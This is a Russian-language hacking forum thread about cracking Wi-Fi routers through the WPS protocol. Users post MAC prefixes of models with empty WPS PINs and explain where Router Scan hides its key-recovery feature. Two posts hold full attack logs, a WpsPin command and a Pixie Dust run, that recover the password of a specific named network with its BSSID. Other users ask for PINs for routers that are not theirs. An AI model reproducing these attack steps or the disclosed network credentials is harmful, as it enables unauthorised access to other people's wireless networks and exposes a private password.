Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. maus

    maus Member

    Joined:
    30 May 2015
    Messages:
    365
    Likes Received:
    98
    Reputations:
    0
    D4:60:E3 - MTS S1010 -p ""
     
  2. Veil

    Veil Banned

    Joined:
    21 May 2015
    Messages:
    2,049
    Likes Received:
    3,420
    Reputations:
    72
    Тогда Флюинс поставь, на нем протестируй и нам расскажешь.
     
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,533
    Likes Received:
    9,510
    Reputations:
    118
    Добавил в RS / 3WiFi. ;)
     
    quite gray, hydra, Triton_Mgn and 3 others like this.
  4. maus

    maus Member

    Joined:
    30 May 2015
    Messages:
    365
    Likes Received:
    98
    Reputations:
    0
    9c:d6:43 - DSL-2640U -p "" ;)
     
    hydra and CRACK211 like this.
  5. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,533
    Likes Received:
    9,510
    Reputations:
    118
    Хм... впервые слышу, чтобы у D-Link DSL-2640U пустой пин.

    Можно полный лог? (желательно из RS)
     
  6. sergey-yo

    sergey-yo New Member

    Joined:
    27 Feb 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Не пойму как вы RS вай фай сканите?
     
  7. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,533
    Likes Received:
    9,510
    Reputations:
    118
    А чего тут непонятного? Всё легко и просто! :)

    https://forum.antichat.ru/posts/4132727/
     
    sergey-yo likes this.
  8. maus

    maus Member

    Joined:
    30 May 2015
    Messages:
    365
    Likes Received:
    98
    Reputations:
    0
    - блин майнить мешаете.
    - в RS нет времени пробовать.
    - пруф 1
    Apple@IPHONE:#_> WpsPin -PIN -SSID Mark -BSSID 9C:D6:43:3C:61:D2
    [+] Тестируем пин в Mark 9C:D6:43:3C:61:D2 (22.12.2017 21:53:43)
    [+] Ар Найдено
    [+] Асоциация с точкой доступа
    [+] Запуск протокола
    [<] Поступила M1
    [>] Отправка M2
    [<] Поступила M3
    [>] Отправка M4
    [<] Поступила M5
    [>] Отправка M6
    [<] Поступила M7
    [>] Отправка WSC NACK
    [*] Действительный Pin:
    [#] Сетевой ключ: Lena2010
    Apple@IPHONE:#_>
    - пруф 2
    [​IMG]
     
  9. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,533
    Likes Received:
    9,510
    Reputations:
    118
    На самом деле ничуть не сложнее / не медленнее (даже иногда быстрее).
    Ок, засчитано. :)
     
  10. maus

    maus Member

    Joined:
    30 May 2015
    Messages:
    365
    Likes Received:
    98
    Reputations:
    0
    - сори, новая система ещё не установил RS.
    - пруф 1
    [*] Audit started.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin "00000000"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 46D4E11158808F2B35BA2F300FEA3B96
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: D-Link Systems
    [*] Model Name: DSL-2640U
    [*] Model Number: DSL-2640U
    [*] Serial Number: 123456789012347
    [*] Device Name: DSL-2640U
    [*] Sending WPS Message M2...
    [*] R-Nonce: C2F0DF8AA8F05A07D827AD4C8F4DDC79
    [*] PKR: 32E291D376075D8366CC817D1F94D96173EE113EC6809A757F0395F764D371E904BBECED559586BBCF1199E32AC7B98E36D5170C9682AEACC75DF5FE92D90796DC571647EAA655A88CBC959A6F06939B60864F1B14C0B80A22B4D7D28D25FECF53F0E774654A8C15A5D1266F9E2673CCF82A91A1947BE92D4F4101DDE52DBC16920A767E42D148624D87F7FD8128952B6B92CBB128918FE2C116FDE0B65092DD80E109FC63B8E8AFD2865856AE6951C5111E523A786076A47F31A87E3B770D16
    [*] AuthKey: 43880ABF2A78AC69CDB442316C23674E2FFD1412F9BA47EE710B95B71790EB2F
    [*] Received WPS Message M3.
    [*] E-Hash1: 021D8FE204133B1A34329E1879BCC5FFD360ACAED5C9BB0B703435D89ED6CB36
    [*] E-Hash2: 021D8FE204133B1A34329E1879BCC5FFD360ACAED5C9BB0B703435D89ED6CB36
    [*] This AP is potentially vulnerable to the "empty string" pin.
    [*] To specify <empty> pin, add empty line to PINs list and disable checksum calculation.
    [*] Also in this case the pin can have two same halfs (e.g. 00000000).
    [*] Sending WPS Message M4...
    [*] Received WSC NACK.
    [-] Error: Wrong PIN code.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Starting Pixie Dust attack...
    [*] Mode: 3 (RTL819x)
    [*] PRNG Seed: 129363 (01/02/70 11:56:03 UTC)
    [*] PSK1: B50D84B4E0853D16866FC69ECC3994D2
    [*] PSK2: 238B2A05808F5160E4A5FBEE928A5124
    [*] E-S1: 34E7C38C0D8E249F5C8A5144791DFDC7
    [*] E-S2: 34E7C38C0D8E249F5C8A5144791DFDC7
    [+] WPS PIN: <empty>
    [*] Reconnecting...
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 6FDDC3A837A65E132563555879A60ED0
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: BEE989DE24D8622EF4246D22FF0A734D
    [*] PKR: FFFCD03E796D344159E72A59512034D9D06352598579EBE84DF96E45F552DC692EA64460CF1B415A979BDE4FE0160836A7F961B981B42EB703106E1A824A7863A6ACDE9D4F724555B7A1EF0EDCD81B9BF733F22209B2D6BBC99886916F3CDC7D43C81986F1BC025335A1EA13B5F0ED24729B6B04A3AC13B397D5D8593D202453073C0F79DCCD0E9F1CC0986509AC277C2503E9FE734835008C1CAD5C52C850EFC7C2B2237F8709964B30A00DC9BBC1AB8162B6D2F741E29CA52A25EB1183CA67
    [*] AuthKey: 746DAD2AEB2A9EC286B3E7983AF9746B654CB0F8020856592D2463E847D6FAB1
    [*] Received WPS Message M3.
    [*] E-Hash1: BF19BACCE524CFAF0E7D1C26FA1E27A025963C674E03ED61FC8E9CF67D5A7571
    [*] E-Hash2: BF19BACCE524CFAF0E7D1C26FA1E27A025963C674E03ED61FC8E9CF67D5A7571
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [+] WPS PIN: <empty>
    [+] SSID: Mark
    [+] Key: Lena2010
    [+] Key Index: 1
    [*] Audit stopped.
    - пруф 2
    [​IMG]
     
  11. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,533
    Likes Received:
    9,510
    Reputations:
    118
    Мощно, спасибо! :) Уже добавил в RS и 3WiFi.
     
  12. rdpstore555

    rdpstore555 New Member

    Joined:
    16 Dec 2017
    Messages:
    17
    Likes Received:
    3
    Reputations:
    0
    nice exploit
     
  13. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    40
    Reputations:
    0
    wireless audit companion такой в арсенале нету. Гууглил не нашел. Мужики, если не затруднит, скиньте ссылку пожалуйста
     
  14. maus

    maus Member

    Joined:
    30 May 2015
    Messages:
    365
    Likes Received:
    98
    Reputations:
    0
    - это в Router Scan'e -> вкладка "Wireless Networks" -> правой кнопкой на точке -> "Obtain key with WPS..." - он и появится.
    [​IMG]
     
    binarymaster and Alexandr17 like this.
  15. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    40
    Reputations:
    0
    У Тебя beta версия. В 2.53 опции нету такой. Не проблема по сути. Благодарю за ответ
     
  16. maus

    maus Member

    Joined:
    30 May 2015
    Messages:
    365
    Likes Received:
    98
    Reputations:
    0
    - написано же v2.60 Beta , последняя.
     
  17. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,533
    Likes Received:
    9,510
    Reputations:
    118
    Надо было не гуглить, а использовать поиск по форуму:

    https://forum.antichat.ru/posts/4156329

    Потому что бета версии выкладываются только здесь. ;)
     
  18. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    40
    Reputations:
    0
    Братюнь, уже нашел. Благодарю. Да знаю конечно. Но в шапке там старая 2.53, а постов много очень в теме. Уже нашел на форуме. Да и на офф сайте ссылка на новый релиз в ачат ведёт. Спасибо за труды. Будем тестировать
     
    binarymaster likes this.
  19. pro100boy

    pro100boy Well-Known Member

    Joined:
    20 Jun 2015
    Messages:
    152
    Likes Received:
    336
    Reputations:
    1
    Подскажите впс пин, спасибо
     

    Attached Files:

  20. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    40
    Reputations:
    0
    У меня пин этого роутера прога нашла и ключ также. Но модель не помню. Да и не с первого раза. Много локов было
     
Loading...